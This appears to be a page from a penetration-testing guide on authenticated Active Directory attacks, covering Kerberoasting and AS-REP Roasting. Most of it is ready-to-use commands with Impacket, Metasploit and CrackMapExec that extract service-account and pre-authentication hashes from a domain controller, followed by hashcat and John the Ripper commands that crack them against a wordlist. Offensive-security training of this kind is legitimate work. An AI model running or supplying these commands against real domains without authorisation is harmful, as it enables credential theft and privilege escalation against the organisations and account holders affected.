This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Authenticated (Post-Compsomise) Attacks

Kerberoasting

Purpose: Extract service account password hashes by requesting TGS tickets for accounts with SPNs, enabling offline password cracking.

Requirements: Valid domain user credentials (any domain user can perform Kerberoasting)

Attack Value: Service accounts often have elevated privileges and weaker passwords, providing direct path to privilege escalation

Discovery and Extraction

Impacket Method

# Discover and extract Kerberoastable accounts
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile kerberoast.txt

# Alternative authentication methods
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP> -request

Metasploit Method

# Kerberoasting through Metasploit framework
use auxiliary/gather/get_user_spns
set RHOSTS <DC-IP>
set DOMAIN <domain.com>
set USERNAME <username>
set PASSWORD <password>
run

Offline Cracking

# Hashcat cracking (mode 13100 for Kerberos TGS)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force

# John the Ripper alternative
john --format=krb5tgs kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

AS-REP Roasting

Purpose: Target accounts without Kerberos pre-authentication to obtain AS-REP hashes for offline cracking.

Requirements: Domain credentials OR username list for unauthenticated attempts

Attack Value: Targets accounts with legacy compatibility settings, often easier to crack than TGS hashes

Discovery and Extraction

Impacket Method

# Extract AS-REP hashes from vulnerable accounts
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile asrep.txt

# Unauthenticated approach with username list
python3 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass

CrackMapExec Method

# Automated AS-REP roasting
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --asreproast asrep_output.txt

Metasploit Method

# AS-REP roasting via Metasploit
use auxiliary/gather/kerberos_enumusers
set RHOSTS <DC-IP>
set DOMAIN <domain.com>
set USER_FILE /path/to/users.txt
run

Offline Cracking

# Hashcat cracking (mode 18200 for AS-REP)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force

# John the Ripper alternative
john --format=krb5asrep asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt
PreviousNon-Authenticated (External) AttacksNextRelay & Poisoning Attacks

Last updated

Was this helpful?